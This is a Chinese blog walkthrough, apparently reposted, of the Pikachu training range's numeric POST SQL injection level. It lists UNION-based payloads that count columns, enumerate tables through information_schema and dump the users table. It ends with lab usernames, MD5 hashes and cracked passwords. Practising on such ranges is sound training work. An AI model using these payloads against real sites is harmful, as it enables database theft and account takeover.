网络安全之pikachu数字型注入(post)实战

最新推荐文章于 2024-04-15 11:38:11 发布
最新推荐文章于 2024-04-15 11:38:11 发布
阅读量1.2k 收藏 8
点赞数 2
分类专栏: 安全 文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44255593/article/details/114095721
版权

1、打开pikachu数字型注入(post)靶场,随机选择一个数字进行查询,并开启BURP进行抓包。

2、使用UNION联合查询法判断字段数,测试在id=1后面构造order by 1和order by 2时没有报错,当个到第三个时回显报错,所以可以判断字段数为2个字段。

id=1 order by 1  &submit=%E6%9F%A5%E8%AF%A2

id=1 order by 3 &submit=%E6%9F%A5%E8%AF%A2


3、通过联合查询法构造union select 1,2语句来判断数据库字段。

id=1 union select 1,2 &submit=%E6%9F%A5%E8%AF%A2

4、通过联合查询法查询数据库库名。

id=1 union select database (),2 &submit=%E6%9F%A5%E8%AF%A2

5、通过上一步联合查询法我们得到靶场上存在的数据库库名,接下来我们查看一下这个数据库里面存在哪些表。

id=1 union select 1,group_concat(table_name) from information_schema.tables where table_schema='pikachu' &submit=%E6%9F%A5%E8%AF%A2

6、通过查询pikachu这个数据库发现里面有users表,然后在查看users表里面存在哪些表项。

id=1 union select 1,group_concat(column_name) from information_schema.columns where table_name='users'  &submit=%E6%9F%A5%E8%AF%A2

7、通过查询users表发现表里存在2个表项分别是username和password,最后分别查看一下这两个表项的内容得到用户名和密码。

id=1 union select 1,username from users username &submit=%E6%9F%A5%E8%AF%A2

id=1 union select 1,password from users password &submit=%E6%9F%A5%E8%AF%A2

最终获取到经过md5加密的密码

用户名经过md5加密过的密码明文密码
admine10adc3949ba59abbe56e057f20f883e123456
pikachu670b14728ad9902aecba32e22fa4f6bd000000
teste99a18c428cb38d5f260853678922e03abc123

 

文章转自:林三岁网络安全实验室

转载请注明出处:https://bbs.linsansui.cn/thread-45-1-1.html

林三岁网络安全实验室
关注
  • 2
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
sql注入 pikachu post数字型注入
08-12
SQL 注入 Pikachu Post 数字型注入 SQL 注入是一种常见的 Web 应用安全漏洞,攻击者可以通过在输入字段中注入恶意的 SQL 语句来获取或修改敏感数据。在本文中,我们将探讨一种新的 Post 数字型注入方法,即使用 ...
sql注入数字型注入
08-02
SQL 注入数字型注入是一种常见的 Web 应用安全漏洞,攻击者可以通过构造恶意输入来inject恶意 SQL 语句,访问或修改数据库中的敏感信息。本文将详细介绍数字型注入的概念、原理、检测方法和防御措施。 一、数字型...
pikachu-SQL】数字型注入post)2022,超详细
weixin_46497491的博客
09-10 1575
pikachu-SQL】数字型注入post)2022,超详细,web渗透,sql注入,渗透测试
Pikachu靶场—sql注入通关
oiadkt的博客
03-07 4736
pickchu—sql注入通关
pikachu靶场第十六关——sqli数字型注入post)(附代码审计)
最新发布
yzasts的博客
04-15 1134
在owasp发布的top10排行榜里,注入漏洞一直是危害排名第一的漏洞,其中注入漏洞里面首当其冲的就是数据库注入漏洞。SQL注入漏洞主要形成的原因是在数据交互中,前端的数据传入到后台处理时,没有做严格的判断,导致其传入的“数据”拼接到SQL语句中后,被当作SQL语句的一部分执行。从而导致数据库受损(被脱裤、被删除、甚至整个服务器权限沦陷)。在构建代码时,一般会从如下几个方面的策略来防止SQL注入漏洞:1.对传进SQL语句里面的变量进行过滤,不允许危险字符传入;
一文了解pikachu的SQL注入
allintao的博客
03-01 2671
本文章主要讲解关于pikachu注入方式。目录一、数字型注入post)二、字符型注入(get)三、搜索型注入四、xx型注入五、"insert/update"注入六、"delete"注入七、"http header"注入八、盲注(base on boolian)九、盲注(base on time)十、宽字节注入
Pikachu靶场:SQL-Inject之数字型注入post
witwitwiter的博客
04-14 1987
Pikachu靶场:SQL-Inject之数字型注入post) 实验环境以及工具 Firefox浏览器、Burp Suite、Pikachu靶场 实验原理 数据库注入漏洞,主要是开发人员在构建代码时,没有对输入边界进行安全考虑,导致攻击着可以通过合法的输入点提交一些精心构造的语句,从而欺骗后台数据库对其进行执行,导致数据库信息泄漏的一种漏洞。 实验步骤 1.前期工作 先将Proxy中的intercept关闭,使其不进行拦截,让数据通过监听的端口。 2.注入点探测 在数字型注入中只看到一个下拉框,里面包含
Pikachu】SQL-Injection
过期的秋刀鱼
08-19 1190
跨表查询:↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓。,也相当于可以通过查询它获取指定数据库下面的表名或列名信息。以上版本中,mysql存在一个自带数据库名为。用户登录的数据库,数据库版本是。自定义关键字:select。或者用bp抓包,构造闭合。第二位和第三位为显示位。查看数据库验证是否正确。存储的是数据库的名称。字段存放数据库的名字。
pikachu靶场包含网络安全中常见的漏洞
11-08
"Pikachu靶场"是一个专门为网络安全爱好者和专业人士设计的实战演练平台,它集成了多种网络安全领域中的经典漏洞,帮助用户深入理解和掌握这些漏洞的原理、利用方法以及防范措施。这个靶场涵盖了XSS跨站脚本攻击、...
pikachu靶场SQL注入.docx
09-13
一、数字型注入POST数字型注入是指在Web应用程序中,输入参数为数字类型的注入。通过对参数的tampering,攻击者可以访问数据库中的敏感信息。数字型注入的判断步骤如下: 1. id=1 后面加 ‘ “ ) “ )来查询...
网络安全pikachu的zip靶机包
10-31
网络安全领域中的Pikachu靶机,以其丰富的漏洞模拟和实战训练特性,成为了广大网络安全爱好者和专业人员的重要学习工具。本文将深入解析Pikachu靶机包,帮助读者了解其核心知识,提升安全防护和攻击检测能力。 一、...
pikachu靶场练习——数字型注入
tyelixy的博客
08-09 1408
burpsuite未安装完成,不涉及抓包相关内容 前置内容 由于网页的生成有时需要用到用户输入的信息,再根据用户输入到数据库中查找相关内容,所以网页中会含有sql语句。针对sql语句,可以进行sql注入。 如: $sql="SELECT * FROM news WHERE id={$id}"; 这样的语句可以进行数字型注入。 题目实战 打开靶场,选择sql数字型注入题,出现以下页面。 下拉栏中有选项 ---以及数字1~6。 选择数字一先发送个请求试试: 可以看到发送的表单中id:1 然后发现可以在检.
Pikachu-----Sql Inject(SQL注入
m0_65712192的博客
12-29 2571
Pikachu-----Sql Inject(SQL注入
Pikachu(皮卡丘)靶场中SQL注入
剁椒鱼头没剁椒的博客
12-14 4955
1)宽字节注入指的是 mysql 数据库在使用宽字节(GBK)编码时,会认为两个 字符是一个汉字(前一个 ascii 码要大于 128(比如%df),才到汉字的范围),而且当我们输入单引号时,mysql 会调用转义函数,将单引号变为’,其中\的十 六进制是%5c,mysql 的 GBK 编码,会认为%df%5c 是一个宽字节,也就是’運’,从而使单引号闭合(逃逸),进行注入攻击。输入kobe’ and 1=1#的时候页面正常,并且kobe’ and 1=2#页面不正常,证明使用单引号闭合。
Pikachu数字型注入、字符型注入通关详解
小小小屿屿屿的博客
11-16 668
pikachu是一个漏洞练习平台,里面包含了大部分常见的Web漏洞,非常适合新手去联系,本文将详细讲述Pikachu靶场中的数字型注入、字符型注入这2关的攻略。
Pikachu的sql数字型注入
m0_63152656的博客
09-24 446
pikachu的sql数字型注入 及 终端打开小皮数据库
pikachu-sql注入
Resets_的博客
04-01 554
pikachu sql数字型注入,字符型注入
SQL注入数字型 pikachu
qq_59607911的博客
10-15 145
查询语句:select id,email from member where username=$id mysql数据库结构在:
Pikachu SQL注入数字型注入
SS_liang的博客
01-11 1515
我们在点击选择框里面的123456时,url没有变化,不是get请求,我们直接抓包试试:1. GET请求:GET请求用于从服务器获取资源,通过将参数附加在URL的末尾来传递数据。这些参数以键值对的形式出现在URL的查询字符串中,例如:http://example.com?GET请求的特点包括:- 数据以明文形式出现在URL中,可以被缓存、书签等记录。- 传输的数据量有限,受URL长度限制。- 数据通过URL传输,对于敏感信息不太安全。- GET请求可被浏览器主动缓存。
pikachu数字型注入(post)
04-10
这个问题是关于使用Python中的字母、数字和下划线命名变量的语法问题。具体来说,'pikachu'是一个以字母开头的变量名,而'\xe6\x95\xb0\xe5\xad\x97\xe5\x9e\x8b\xe6\xb3\xa8\xe5\x85\xa5(post)'可能是一个函数或方法的参数名称。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值